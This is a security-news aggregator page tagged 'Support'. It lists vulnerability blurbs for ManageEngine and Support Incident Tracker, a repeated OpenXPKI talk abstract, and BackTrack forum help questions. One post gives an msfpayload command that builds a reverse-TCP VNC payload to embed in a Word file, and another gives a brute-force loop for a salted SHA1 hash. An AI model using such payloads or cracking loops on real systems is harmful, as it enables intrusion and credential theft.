«
Expand/Collapse
255 items tagged "Support"
Related tags:
txt [+],
network [+],
manageengine [+],
code execution [+],
General [+],
sit [+],
bt4 [+],
strace [+],
sql injection [+],
security [+],
php [+],
cross site scripting [+],
windows [+],
usb [+],
Software [+],
wifi [+],
tickets [+],
security risks [+],
pages [+],
microsoft [+],
metasploit [+],
exploit [+],
chaos communication congress [+],
boot [+],
wpa [+],
wlan [+],
vmware [+],
sql [+],
smtp server [+],
smtp [+],
security risk [+],
security modules [+],
sasl [+],
question [+],
problem [+],
partition [+],
openxpki [+],
michael bell [+],
memory corruption [+],
mac [+],
lan [+],
infrastructure components [+],
google [+],
forgery [+],
cyrus sasl [+],
cyrus [+],
command execution [+],
certificate [+],
carte [+],
ca arcserve [+],
bssid [+],
arcserve backup [+],
alpha [+],
alexander klink [+],
Hardware [+],
wep [+],
vulnerabilities [+],
virtual channels [+],
upload [+],
unauthorized access [+],
support component [+],
security vulnerabilities [+],
root [+],
player [+],
phreebird [+],
package [+],
nat [+],
microsoft dns [+],
login [+],
key generation [+],
joomla [+],
information disclosure vulnerability [+],
hey guys [+],
freestyle [+],
file php [+],
file [+],
error [+],
drive [+],
dnssec [+],
disk [+],
directory traversal vulnerability [+],
directory [+],
component version [+],
card [+],
arbitrary code [+],
alfa [+],
airodump [+],
support incident [+],
xss [+],
wpa supplicant [+],
wordlist [+],
wireless networks [+],
wireless extensions [+],
wifi card [+],
web applications [+],
web [+],
ubuntu [+],
type [+],
time [+],
thanks in advance [+],
system [+],
sysinfo [+],
startx [+],
ssid [+],
siteminder [+],
shell [+],
server [+],
safer use [+],
root hub [+],
rien [+],
read [+],
priority 1 [+],
persistent changes [+],
performance manager [+],
password [+],
oracle [+],
netbook [+],
monitor [+],
mobility radeon [+],
microsoft help [+],
merci [+],
manager. a [+],
m arp [+],
livecd [+],
laptop [+],
jre [+],
internet [+],
input validation vulnerabilities [+],
home [+],
hdd [+],
hacks [+],
grub [+],
gig [+],
fusion [+],
fatal server error [+],
exec [+],
everyone [+],
ettercap [+],
encryption [+],
ehealth [+],
drive cache [+],
dico [+],
dhclient [+],
denial of service [+],
cl [+],
chntpw [+],
chipset driver [+],
bt3 [+],
broadcom [+],
bonsoir [+],
bonjour [+],
ati [+],
arp [+],
arcserve [+],
anybody [+],
aircrack [+],
vulnerability [+],
incident [+],
zurzeit [+],
xrandr [+],
xorg [+],
x [+],
wpa key [+],
world [+],
workstation [+],
work [+],
word list [+],
wireshark [+],
wireless signal [+],
wireless adapter [+],
windows boot [+],
wikileaks [+],
wicd [+],
while [+],
wep keys [+],
wep crack [+],
welcome thanks [+],
weird reason [+],
webapps [+],
way [+],
watt [+],
wasent [+],
warns [+],
voip [+],
vncinject [+],
vnc server [+],
vmware workstation [+],
vmware tools [+],
vm player [+],
vm machine [+],
vista [+],
virtual machine [+],
virtual drives [+],
victim machine [+],
version [+],
utilisation [+],
username [+],
user [+],
use [+],
usb wireless [+],
usb memory stick [+],
usb devices [+],
urlsnarf [+],
update [+],
unsupport [+],
unrar [+],
uninstall [+],
ubuntu repositories [+],
tx power [+],
treiber [+],
traffik [+],
torrent [+],
todays [+],
tmp [+],
tls [+],
timer module [+],
timer [+],
til [+],
ticket [+],
terabyte hard drive [+],
technology [+],
tcp [+],
target [+],
table [+],
system options [+],
system boots [+],
system administrator [+],
system 1 [+],
synaptic [+],
svp [+],
super nintendo [+],
sudo [+],
steve dispensa [+],
station [+],
standalone application [+],
sslv3 [+],
ssh [+],
ssd [+],
sr 1 [+],
speicher [+],
sparky [+],
space [+],
sound [+],
sony [+],
something [+],
solid state disk [+],
software management system [+],
snes [+],
small [+],
slackware [+],
site [+],
sipdump [+],
sipcrack [+],
simple [+],
signal [+],
side [+],
shikata ga nai [+],
sha1 [+],
sha [+],
session features [+],
session [+],
servey [+],
server down [+],
server connection [+],
sending [+],
security co [+],
security advisor [+],
sdc [+],
scripts [+],
script files [+],
script [+],
scribs [+],
screen [+],
scams [+],
sapre [+],
salt [+],
rtt [+],
rseau [+],
router [+],
rosa [+],
root shell [+],
root login [+],
root folder [+],
room quality [+],
room [+],
rj 45 [+],
right direction [+],
retaliation [+],
ressource [+],
resolutions [+],
resolution problem [+],
resolution [+],
request [+],
repositories [+],
replay attack [+],
renegotiation [+],
reg hack [+],
recovery [+],
reading package [+],
reading database [+],
rar [+],
range error [+],
range [+],
rand [+],
rahul sapre [+],
rahul [+],
radeon treiber [+],
radeon [+],
quote [+],
quiet 1 [+],
quality [+],
pyrit [+],
pxe [+],
public ip [+],
proliant [+],
projet [+],
program settings [+],
process [+],
problme [+],
probleme avec windows [+],
probleme [+],
prob [+],
prefix [+],
pre [+],
pouvoir [+],
port 4444 [+],
port [+],
point web [+],
point [+],
pmks [+],
planet [+],
place [+],
phil [+],
perpose [+],
permission [+],
peripherie [+],
period of time [+],
penetration [+],
pasword [+],
pass [+],
partition xp [+],
partions [+],
parallels [+],
pain in the ass [+],
pack [+],
output options [+],
output [+],
other interested parties [+],
opn [+],
openvas [+],
openoffice [+],
omni antenna [+],
office router [+],
office [+],
oci [+],
ntfs partition [+],
nothing [+],
notebook [+],
nmap [+],
nintendo [+],
news [+],
new mac [+],
networkmanager [+],
network interface [+],
network cards [+],
netwerk [+],
netapi [+],
necessary files [+],
nbsp nbsp nbsp nbsp nbsp [+],
nbsp [+],
name [+],
my own [+],
multiple [+],
msfpayload [+],
mr.x [+],
mozilla [+],
monde [+],
mon [+],
modprobe [+],
modes [+],
mode [+],
mobile radeon [+],
mkdir [+],
missing files [+],
misc [+],
mini pci [+],
min [+],
milliwatt [+],
microsoft windows help and support [+],
microsoft support [+],
microprocesseur [+],
microcontroller [+],
meterpreter [+],
metasploit framework [+],
message code [+],
menu bar [+],
menu [+],
memory [+],
mckinnon [+],
marsh ray [+],
mantra [+],
mancunian [+],
man in the middle attack [+],
mal [+],
magicjack [+],
mad [+],
machine [+],
macchanger [+],
macbook [+],
mac spoofing [+],
mac side [+],
mac address [+],
lukas lueg [+],
lukas [+],
low disk space [+],
loopback [+],
login root [+],
list [+],
linux support [+],
linux source [+],
linux partition [+],
linux [+],
line thanks [+],
lilo [+],
life [+],
lhost [+],
lequelle [+],
length [+],
lecteur cd rom [+],
last time [+],
lang [+],
lance 4 [+],
la batterie [+],
l instant [+],
kismet [+],
kind [+],
keyboard [+],
kernal [+],
kde [+],
jsp [+],
jon [+],
jobby [+],
jboss [+],
jai [+],
jacky [+],
issue [+],
iso [+],
iphone [+],
ipadress [+],
internet wireless [+],
internet menu [+],
internal hd [+],
interface card [+],
interface [+],
intelligence support systems [+],
intelligence [+],
intel pro [+],
intel 945 chipset [+],
intel [+],
installer windows [+],
installation [+],
insmod [+],
injection [+],
initrd [+],
indo [+],
import sys [+],
imagem [+],
imac [+],
ieee [+],
i ca [+],
http [+],
how to connect to a wireless network [+],
host os [+],
host ip [+],
host [+],
home directory [+],
hibernate [+],
hhd [+],
help [+],
hello everyone [+],
hash [+],
hardware drivers [+],
hard [+],
handshake [+],
handler [+],
hacking tool [+],
habs [+],
guy [+],
grub boot loader [+],
graphics card [+],
graphical mode [+],
graphic driver [+],
graphic cards [+],
graphic [+],
gnu general public license [+],
gnome [+],
gigabit network [+],
ghz [+],
genpmk [+],
generator [+],
gcc version [+],
gateway ip [+],
gary mckinnon [+],
gary [+],
full [+],
freeze [+],
forwarding [+],
forum search [+],
flash player 10 [+],
flash drive [+],
fine [+],
file upload [+],
file permissions [+],
fatal [+],
fat [+],
fashion [+],
fantastic forum [+],
extracting rar files [+],
external hdd [+],
external hd [+],
eth [+],
etait [+],
error code 15 [+],
efsl [+],
eeepc [+],
eee pc [+],
eee [+],
ecran [+],
easynote [+],
dwl g [+],
dual boot with windows [+],
dual boot [+],
drupal [+],
drivers windows [+],
driver 1 [+],
driver [+],
driftnet [+],
download [+],
dongle [+],
dock [+],
disque dur [+],
disque [+],
directory code [+],
diode [+],
detect [+],
destination port [+],
desktop [+],
denke [+],
dell inspiron b130 notebook [+],
dell inspiron [+],
delema [+],
delay [+],
default system [+],
default [+],
debutant [+],
deb [+],
danke schon [+],
danke [+],
d link router [+],
d link [+],
custom [+],
cueburst [+],
crypt [+],
crs [+],
critical error [+],
cracker [+],
crack [+],
cpu core [+],
could allow remote code execution [+],
connexion cable [+],
connectivity [+],
connectionnotestablished [+],
connection [+],
connect [+],
configuring [+],
computer science [+],
computer [+],
command [+],
code [+],
click [+],
cle [+],
class action lawsuit [+],
chipset [+],
chiba [+],
channel 11 [+],
channel [+],
cfdisk [+],
ces [+],
carte usb [+],
cable side [+],
busybox [+],
bugtraq [+],
bridge [+],
bootable usb [+],
bonjours [+],
board search [+],
bluetooth [+],
bling [+],
blah blah [+],
bit [+],
bcm [+],
bar [+],
awus [+],
authentication request [+],
auth [+],
auflsung [+],
attacker [+],
ati mobility [+],
ati firegl v5200 [+],
ati driver [+],
atheros [+],
arphrd [+],
archive [+],
april first [+],
app [+],
anyone [+],
antenna [+],
angebot [+],
andy mller [+],
amp [+],
amazon [+],
aireplay ng [+],
affiche x [+],
adresse mail [+],
adminstrator [+],
activerecord [+],
access point [+],
access [+],
Skype [+],
Release [+],
ExploitsVulnerabilities [+],
Espace [+],
500gb hard drive [+],
10min [+],
mysql [+],
sydbox [+],
sandbox [+],
execve [+],
catbox [+],
materiel [+],
tracker [+],
suite versions [+],
suite 3 [+],
suite [+],
kayako [+],
BackTrack [+],
quot [+],
center [+],
tar bz2 [+],
logiciel [+],
day [+],
proper location,
port 31337,
payload,
logical block,
intel graphics media accelerator,
ethical hacker,
device,
cold fusion application,
basic linux books,
atapi device
-
-
17:00
»
SecuriTeam
ManageEngine Support Center Plus is prone to a cross-site scripting vulnerability, an arbitrary-file-upload vulnerability, and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
-
-
12:22
»
Packet Storm Security Exploits
ManageEngine Support Center Plus versions 7908 and below suffer from multiple cross site scripting and shell upload vulnerabilities.
-
-
21:34
»
Packet Storm Security Recent Files
Sydbox is a ptrace-based sandbox implementation. It intercepts system calls, checks for allowed filesystem prefixes, and denies them when checks fail. It has basic support for disallowing network connections. It has basic support to sandbox execve calls. It is based in part on catbox and strace.
-
21:34
»
Packet Storm Security Tools
Sydbox is a ptrace-based sandbox implementation. It intercepts system calls, checks for allowed filesystem prefixes, and denies them when checks fail. It has basic support for disallowing network connections. It has basic support to sandbox execve calls. It is based in part on catbox and strace.
-
21:34
»
Packet Storm Security Misc. Files
Sydbox is a ptrace-based sandbox implementation. It intercepts system calls, checks for allowed filesystem prefixes, and denies them when checks fail. It has basic support for disallowing network connections. It has basic support to sandbox execve calls. It is based in part on catbox and strace.
-
-
12:16
»
SecDocs
Authors:
Alexander Klink Michael Bell Tags:
X.509 Event:
Chaos Communication Congress 23th (23C3) 2006 Abstract: OpenXPKI is an open source trust center software, written by the OpenXPKI Project, which aims to create an enterprise-scale PKI solution. You can see what OpenXPKI is all about, what you can do with it out-of-the-box and how you can hack it to your liking. In this talk, the open source trust center software OpenXPKI will be presented. OpenXPKI aims at creating an enterprise-scale PKI/trust center software supporting well established infrastructure components like RDBMS and Hardware Security Modules (HSMs). It is the successor of OpenCA, and builds on the experience gained while developing it. Currently still under heavy development, OpenXPKI aims to be used in production by mid-October. Thus, a working release will be present before the congress. Features that are available as of this writing (September 2006): - CA rollover: "Normal" trust center software usually does not account for the installment of a new CA certificate, thus if the CA certificate becomes invalid, a complete re-deployment has to be undertaken. OpenXPKI solves this problem by automatically deciding which CA certificate to use at a certain point in time. - Support for multiple so-called "PKI realms": Different CA instances can be run in a single installation without any interaction between them, so one machine can be used for different CAs. - Private key support both in hardware and software: OpenXPKI has support for professional Hardware Security Modules such as the nCipher nShield or the Chrysalis-ITS Luna CA modules. If such modules are not available, access to a key can be protected by using a threshold secret sharing algorithm. - Professional database support: The user can choose from a range of database backends, including commercial ones such as Oracle or DB2, which are typically used in enterprise scenarios. - Many different interfaces to the server: Currently, one can access the CA server using a web-interface (which also allows for client-side request generation using SPKAC) or using a command line client. Embedded devices such as routers can use the Simple Certificate Enrollment Protocol (SCEP) to talk to the server and apply for certificates. - Workflow Engine: OpenXPKI aims to be extremly customizable by allowing the definition of workflows for any process you can think of in the PKI area. Typical workflows such as editing and approving certificate signing requests, certificate and CRL issuance are already implemented. Implementing your own idea is normally pretty easy by defining a workflow in XML and (maybe) implementing a few lines in Perl. - I18N: Localization of the application and interfaces is easily possible and OpenXPKI can of course deal with the whole range of Unicode characters in certificates. Features that will be done by the time the congress happens: - LDAP publication: It will be possible to publish both certificates as well as Certificate Revocation Lists (CRLs) using LDAP. - Self-Service application for token personalization: A web application will be available that allows a user to easily create and install certificates to a SmartCard. For the future, an integration with management systems such as Tivoli and Nagios, clustering support for issuance of more than 500.000 certificates/day as well as CMC (the Certificate Management protocol using CMS) support are planned. Implementing CMC over COM would be especially useful as it would then be possible to seamlessly replace a Microsoft CA. A large financial corporation plans to use OpenXPKI in production once it is ready for prime-time.
-
12:03
»
SecDocs
Authors:
Alexander Klink Michael Bell Tags:
X.509 Event:
Chaos Communication Congress 23th (23C3) 2006 Abstract: OpenXPKI is an open source trust center software, written by the OpenXPKI Project, which aims to create an enterprise-scale PKI solution. You can see what OpenXPKI is all about, what you can do with it out-of-the-box and how you can hack it to your liking. In this talk, the open source trust center software OpenXPKI will be presented. OpenXPKI aims at creating an enterprise-scale PKI/trust center software supporting well established infrastructure components like RDBMS and Hardware Security Modules (HSMs). It is the successor of OpenCA, and builds on the experience gained while developing it. Currently still under heavy development, OpenXPKI aims to be used in production by mid-October. Thus, a working release will be present before the congress. Features that are available as of this writing (September 2006): - CA rollover: "Normal" trust center software usually does not account for the installment of a new CA certificate, thus if the CA certificate becomes invalid, a complete re-deployment has to be undertaken. OpenXPKI solves this problem by automatically deciding which CA certificate to use at a certain point in time. - Support for multiple so-called "PKI realms": Different CA instances can be run in a single installation without any interaction between them, so one machine can be used for different CAs. - Private key support both in hardware and software: OpenXPKI has support for professional Hardware Security Modules such as the nCipher nShield or the Chrysalis-ITS Luna CA modules. If such modules are not available, access to a key can be protected by using a threshold secret sharing algorithm. - Professional database support: The user can choose from a range of database backends, including commercial ones such as Oracle or DB2, which are typically used in enterprise scenarios. - Many different interfaces to the server: Currently, one can access the CA server using a web-interface (which also allows for client-side request generation using SPKAC) or using a command line client. Embedded devices such as routers can use the Simple Certificate Enrollment Protocol (SCEP) to talk to the server and apply for certificates. - Workflow Engine: OpenXPKI aims to be extremly customizable by allowing the definition of workflows for any process you can think of in the PKI area. Typical workflows such as editing and approving certificate signing requests, certificate and CRL issuance are already implemented. Implementing your own idea is normally pretty easy by defining a workflow in XML and (maybe) implementing a few lines in Perl. - I18N: Localization of the application and interfaces is easily possible and OpenXPKI can of course deal with the whole range of Unicode characters in certificates. Features that will be done by the time the congress happens: - LDAP publication: It will be possible to publish both certificates as well as Certificate Revocation Lists (CRLs) using LDAP. - Self-Service application for token personalization: A web application will be available that allows a user to easily create and install certificates to a SmartCard. For the future, an integration with management systems such as Tivoli and Nagios, clustering support for issuance of more than 500.000 certificates/day as well as CMC (the Certificate Management protocol using CMS) support are planned. Implementing CMC over COM would be especially useful as it would then be possible to seamlessly replace a Microsoft CA. A large financial corporation plans to use OpenXPKI in production once it is ready for prime-time.
-
12:02
»
SecDocs
Authors:
Alexander Klink Michael Bell Tags:
X.509 Event:
Chaos Communication Congress 23th (23C3) 2006 Abstract: OpenXPKI is an open source trust center software, written by the OpenXPKI Project, which aims to create an enterprise-scale PKI solution. You can see what OpenXPKI is all about, what you can do with it out-of-the-box and how you can hack it to your liking. In this talk, the open source trust center software OpenXPKI will be presented. OpenXPKI aims at creating an enterprise-scale PKI/trust center software supporting well established infrastructure components like RDBMS and Hardware Security Modules (HSMs). It is the successor of OpenCA, and builds on the experience gained while developing it. Currently still under heavy development, OpenXPKI aims to be used in production by mid-October. Thus, a working release will be present before the congress. Features that are available as of this writing (September 2006): - CA rollover: "Normal" trust center software usually does not account for the installment of a new CA certificate, thus if the CA certificate becomes invalid, a complete re-deployment has to be undertaken. OpenXPKI solves this problem by automatically deciding which CA certificate to use at a certain point in time. - Support for multiple so-called "PKI realms": Different CA instances can be run in a single installation without any interaction between them, so one machine can be used for different CAs. - Private key support both in hardware and software: OpenXPKI has support for professional Hardware Security Modules such as the nCipher nShield or the Chrysalis-ITS Luna CA modules. If such modules are not available, access to a key can be protected by using a threshold secret sharing algorithm. - Professional database support: The user can choose from a range of database backends, including commercial ones such as Oracle or DB2, which are typically used in enterprise scenarios. - Many different interfaces to the server: Currently, one can access the CA server using a web-interface (which also allows for client-side request generation using SPKAC) or using a command line client. Embedded devices such as routers can use the Simple Certificate Enrollment Protocol (SCEP) to talk to the server and apply for certificates. - Workflow Engine: OpenXPKI aims to be extremly customizable by allowing the definition of workflows for any process you can think of in the PKI area. Typical workflows such as editing and approving certificate signing requests, certificate and CRL issuance are already implemented. Implementing your own idea is normally pretty easy by defining a workflow in XML and (maybe) implementing a few lines in Perl. - I18N: Localization of the application and interfaces is easily possible and OpenXPKI can of course deal with the whole range of Unicode characters in certificates. Features that will be done by the time the congress happens: - LDAP publication: It will be possible to publish both certificates as well as Certificate Revocation Lists (CRLs) using LDAP. - Self-Service application for token personalization: A web application will be available that allows a user to easily create and install certificates to a SmartCard. For the future, an integration with management systems such as Tivoli and Nagios, clustering support for issuance of more than 500.000 certificates/day as well as CMC (the Certificate Management protocol using CMS) support are planned. Implementing CMC over COM would be especially useful as it would then be possible to seamlessly replace a Microsoft CA. A large financial corporation plans to use OpenXPKI in production once it is ready for prime-time.
-
12:00
»
SecDocs
Authors:
Alexander Klink Michael Bell Tags:
X.509 Event:
Chaos Communication Congress 23th (23C3) 2006 Abstract: OpenXPKI is an open source trust center software, written by the OpenXPKI Project, which aims to create an enterprise-scale PKI solution. You can see what OpenXPKI is all about, what you can do with it out-of-the-box and how you can hack it to your liking. In this talk, the open source trust center software OpenXPKI will be presented. OpenXPKI aims at creating an enterprise-scale PKI/trust center software supporting well established infrastructure components like RDBMS and Hardware Security Modules (HSMs). It is the successor of OpenCA, and builds on the experience gained while developing it. Currently still under heavy development, OpenXPKI aims to be used in production by mid-October. Thus, a working release will be present before the congress. Features that are available as of this writing (September 2006): - CA rollover: "Normal" trust center software usually does not account for the installment of a new CA certificate, thus if the CA certificate becomes invalid, a complete re-deployment has to be undertaken. OpenXPKI solves this problem by automatically deciding which CA certificate to use at a certain point in time. - Support for multiple so-called "PKI realms": Different CA instances can be run in a single installation without any interaction between them, so one machine can be used for different CAs. - Private key support both in hardware and software: OpenXPKI has support for professional Hardware Security Modules such as the nCipher nShield or the Chrysalis-ITS Luna CA modules. If such modules are not available, access to a key can be protected by using a threshold secret sharing algorithm. - Professional database support: The user can choose from a range of database backends, including commercial ones such as Oracle or DB2, which are typically used in enterprise scenarios. - Many different interfaces to the server: Currently, one can access the CA server using a web-interface (which also allows for client-side request generation using SPKAC) or using a command line client. Embedded devices such as routers can use the Simple Certificate Enrollment Protocol (SCEP) to talk to the server and apply for certificates. - Workflow Engine: OpenXPKI aims to be extremly customizable by allowing the definition of workflows for any process you can think of in the PKI area. Typical workflows such as editing and approving certificate signing requests, certificate and CRL issuance are already implemented. Implementing your own idea is normally pretty easy by defining a workflow in XML and (maybe) implementing a few lines in Perl. - I18N: Localization of the application and interfaces is easily possible and OpenXPKI can of course deal with the whole range of Unicode characters in certificates. Features that will be done by the time the congress happens: - LDAP publication: It will be possible to publish both certificates as well as Certificate Revocation Lists (CRLs) using LDAP. - Self-Service application for token personalization: A web application will be available that allows a user to easily create and install certificates to a SmartCard. For the future, an integration with management systems such as Tivoli and Nagios, clustering support for issuance of more than 500.000 certificates/day as well as CMC (the Certificate Management protocol using CMS) support are planned. Implementing CMC over COM would be especially useful as it would then be possible to seamlessly replace a Microsoft CA. A large financial corporation plans to use OpenXPKI in production once it is ready for prime-time.
-
-
5:12
»
Packet Storm Security Exploits
ManageEngine Support Center Plus versions 7903 and below suffer from backup related, unauthorized access, cross site scripting, and remote SQL injection vulnerabilities.
-
5:12
»
Packet Storm Security Recent Files
ManageEngine Support Center Plus versions 7903 and below suffer from backup related, unauthorized access, cross site scripting, and remote SQL injection vulnerabilities.
-
5:12
»
Packet Storm Security Misc. Files
ManageEngine Support Center Plus versions 7903 and below suffer from backup related, unauthorized access, cross site scripting, and remote SQL injection vulnerabilities.
-
17:37
»
Packet Storm Security Recent Files
SiT! Support Incident Tracker version 3.64 suffers from cross site scripting, cross site request forgery and remote SQL injection vulnerabilities.
-
17:37
»
Packet Storm Security Misc. Files
SiT! Support Incident Tracker version 3.64 suffers from cross site scripting, cross site request forgery and remote SQL injection vulnerabilities.
-
-
11:11
»
Packet Storm Security Exploits
This Metasploit module combines two separate issues within Support Incident Tracker versions 3.65 and below to upload arbitrary data and thus execute a shell. The two issues exist in ftp_upload_file.php. The first vulnerability exposes the upload dir used to store attachments. The second vulnerability allows arbitrary file upload since there is no validation function to prevent from uploading any file type. Authentication is required to exploit both vulnerabilities.
-
11:11
»
Packet Storm Security Recent Files
This Metasploit module combines two separate issues within Support Incident Tracker versions 3.65 and below to upload arbitrary data and thus execute a shell. The two issues exist in ftp_upload_file.php. The first vulnerability exposes the upload dir used to store attachments. The second vulnerability allows arbitrary file upload since there is no validation function to prevent from uploading any file type. Authentication is required to exploit both vulnerabilities.
-
11:11
»
Packet Storm Security Misc. Files
This Metasploit module combines two separate issues within Support Incident Tracker versions 3.65 and below to upload arbitrary data and thus execute a shell. The two issues exist in ftp_upload_file.php. The first vulnerability exposes the upload dir used to store attachments. The second vulnerability allows arbitrary file upload since there is no validation function to prevent from uploading any file type. Authentication is required to exploit both vulnerabilities.
-
-
15:09
»
Packet Storm Security Exploits
SiT! Support Incident Tracker version 3.64 suffers from cross site request forgery, cross site scripting, and remote SQL injection vulnerabilities.
-
15:09
»
Packet Storm Security Recent Files
SiT! Support Incident Tracker version 3.64 suffers from cross site request forgery, cross site scripting, and remote SQL injection vulnerabilities.
-
15:09
»
Packet Storm Security Misc. Files
SiT! Support Incident Tracker version 3.64 suffers from cross site request forgery, cross site scripting, and remote SQL injection vulnerabilities.
-
-
15:55
»
Packet Storm Security Recent Files
Sydbox is a ptrace-based sandbox implementation. It intercepts system calls, checks for allowed filesystem prefixes, and denies them when checks fail. It has basic support for disallowing network connections. It has basic support to sandbox execve calls. It is based in part on catbox and strace.
-
15:55
»
Packet Storm Security Tools
Sydbox is a ptrace-based sandbox implementation. It intercepts system calls, checks for allowed filesystem prefixes, and denies them when checks fail. It has basic support for disallowing network connections. It has basic support to sandbox execve calls. It is based in part on catbox and strace.
-
15:55
»
Packet Storm Security Misc. Files
Sydbox is a ptrace-based sandbox implementation. It intercepts system calls, checks for allowed filesystem prefixes, and denies them when checks fail. It has basic support for disallowing network connections. It has basic support to sandbox execve calls. It is based in part on catbox and strace.
-
-
17:31
»
Packet Storm Security Recent Files
Phreebird is a DNSSEC proxy that operates in front of an existing DNS server (such as BIND, Unbound, PowerDNS, Microsoft DNS, or QIP) and supplements its records with DNSSEC responses. Features of Phreebird include automatic key generation, realtime record signing, support for arbitrary responses, zero configuration, NSEC3 "White Lies", caching and rate limiting to deter DoS attacks, and experimental support for both Coarse Time over DNS and HTTP Virtual Channels. The suite also contains a large amount of sample code, including support for federated identity over OpenSSH. Finally, "Phreeload" enhances existing OpenSSL applications with DNSSEC support.
-
17:31
»
Packet Storm Security Tools
Phreebird is a DNSSEC proxy that operates in front of an existing DNS server (such as BIND, Unbound, PowerDNS, Microsoft DNS, or QIP) and supplements its records with DNSSEC responses. Features of Phreebird include automatic key generation, realtime record signing, support for arbitrary responses, zero configuration, NSEC3 "White Lies", caching and rate limiting to deter DoS attacks, and experimental support for both Coarse Time over DNS and HTTP Virtual Channels. The suite also contains a large amount of sample code, including support for federated identity over OpenSSH. Finally, "Phreeload" enhances existing OpenSSL applications with DNSSEC support.
-
17:31
»
Packet Storm Security Misc. Files
Phreebird is a DNSSEC proxy that operates in front of an existing DNS server (such as BIND, Unbound, PowerDNS, Microsoft DNS, or QIP) and supplements its records with DNSSEC responses. Features of Phreebird include automatic key generation, realtime record signing, support for arbitrary responses, zero configuration, NSEC3 "White Lies", caching and rate limiting to deter DoS attacks, and experimental support for both Coarse Time over DNS and HTTP Virtual Channels. The suite also contains a large amount of sample code, including support for federated identity over OpenSSH. Finally, "Phreeload" enhances existing OpenSSL applications with DNSSEC support.
-
-
21:01
»
Packet Storm Security Tools
Sydbox is a ptrace-based sandbox implementation. It intercepts system calls, checks for allowed filesystem prefixes, and denies them when checks fail. It has basic support for disallowing network connections. It has basic support to sandbox execve calls. It is based in part on catbox and strace.
-
19:41
»
Packet Storm Security Tools
Sydbox is a ptrace-based sandbox implementation. It intercepts system calls, checks for allowed filesystem prefixes, and denies them when checks fail. It has basic support for disallowing network connections. It has basic support to sandbox execve calls. It is based in part on catbox and strace.
-
13:47
»
remote-exploit & backtrack
I've made myself a problem I cant figure out. . .
Code:
cat ~/.scribs/bin/ds1
#!/usr/bin/env python
import sha
import sys
SALT = sys.argv[1]
PASS = sys.argv[2]
HASH = sha.new(sha.new(SALT + PASS).hexdigest()).hexdigest()
print HASH.upper()
I have written this in python and am try to crack the pass with john, but am not sure how to tell john to encrypt with sha1 twice.
here is a sample hash:
B2CDFEA7E83FD36763E55C0FC6577D039BE005A2
Which is 'saltpass' in plain text.
I can crack it with:
Code:
for pass in `crunch 1 4 abcdefghijklmnopqrstuvwxyz0123456789 -t @@@@`;
do echo salt$pass:`ds1 salt $pass` | grep B2CDFEA7E83FD36763E55C0FC6577D039BE005A2;
done
How should I go about testing it against john? Is adding a new format and recompiling the only solution?
-
-
20:01
»
Packet Storm Security Tools
Sydbox is a ptrace-based sandbox implementation. It intercepts system calls, checks for allowed filesystem prefixes, and denies them when checks fail. It has basic support for disallowing network connections. It has basic support to sandbox execve calls. It is based in part on catbox and strace.
-
20:01
»
Packet Storm Security Recent Files
Sydbox is a ptrace-based sandbox implementation. It intercepts system calls, checks for allowed filesystem prefixes, and denies them when checks fail. It has basic support for disallowing network connections. It has basic support to sandbox execve calls. It is based in part on catbox and strace.
-
-
18:00
»
Packet Storm Security Advisories
Ubuntu Security Notice 990-1 - Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3 protocols. If an attacker could perform a man in the middle attack at the start of a TLS connection, the attacker could inject arbitrary content at the beginning of the user's session. This update adds backported support for the new RFC5746 renegotiation extension and will use it when both the client and the server support it.
-
-
19:41
»
remote-exploit & backtrack
Hi everyone, I feel like a bit of a goose regarding this issue but after searching and searching I still can't find my answer so I was hoping someone could shed some light on this for me.
The problem I am having is that when I try to output an nmap scan using metasploit for example:
msf> db_nmap -v -sV 192.168.238.100 -oA /home/output
I only get the grepable output and not the other major outputs, if I specify that I want xml output it wont produce any output at all.
However if I am using nmap as a standalone application all the output options and formats work as they should.
I'm running Backtrack 4 R1, with Metaspolit 3.4.2-dev and nmap 5.35DC1.
-
-
12:40
»
remote-exploit & backtrack
How good/bad does backtrack work on parallels 5? and how does it compare with running it in vmware fusion.
-
-
14:18
»
remote-exploit & backtrack
Sorry its been a while since i been here as well as use BT4-pre Final.
My question is that or may i say my concern is, i have alot of things customized and stored on my vmware with bt4-pre final installed. And since i haven't used it for a while i forgot how to use a few things....
But if i open it up as of right now, those things would comeback to memory.
Q: if i were to upgrade to backtrack 4 final, can i or will i still be able to keep everything on bt4 pre final intact ?
-such as notes, personal .sh scripts, settings, etc...
cause i dont want to upgrade and forget how to do this, that, and the third. I remember updating the kernal on bt4-pre and that was a pain in the ass, but i got through.
-
-
1:28
»
remote-exploit & backtrack
Bonjour, je débute dans le wifi et j’aimerai savoir si l’alpha AWUS036H 1 watt et compatible sur backtrack 3. J’aimerai également savoir si le site suivant pour acheter cette carte usb wifi est fiable : tandco.fr.
J’aimerai savoir pourquoi l’alpha 500 milliwatt est plus cher que la 1 watt. Selon ma logique sa devrai être le contraire, non ?
Merci de me répondre.
Cordialemant,
-
-
15:20
»
remote-exploit & backtrack
Hey guys,
I installed my backtrack 4 final on my laptop and it was containing windows vista , in vista i was able to connect to my wireless connection easily , but when i removed vista and installed backtrack , i couldn't connect to any because it didn't even find any wireless !
I googled for that and found a lot of commands , like ifconfig wlan0 up and dhcpcd and so on , but when i enter ifconfig wlan0 up , it says that there isn't wlan0 network to up it ! ( im also using wicd manager and every time i click on Refresh it says that there isn't any wireless connection , so this issue - as i think - is about finding the wireless connection and then i think it's easy to connect if i found it )
This is my issue about the wireless , my question is how can i scan and find the wireless connection and connect to it .
Regards
Jacky
-
-
10:41
»
remote-exploit & backtrack
Hallo ich bafasse mich seit kurzem mit metasploit. Habe dazu mein Ubuntu Linux mit metasploit ausgestattet und in einer VM ein Windows Home XP SP2. Habe dazu mit msfpayload ein file erstellt:
Code:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.178.50 V > /tmp/testfile.bas
dieses file versuche ich dann in das Wordfile zu integrieren, doch sobald ich mit dem importierten Code speicher will bekomme ich immer die Meldung, dass ich zu wenig speicher hätte.
Hat jemand eine Idee woran das liegen könnte? Danke schon mal für die Hilfe.
Danke schon mal
-
-
14:32
»
remote-exploit & backtrack
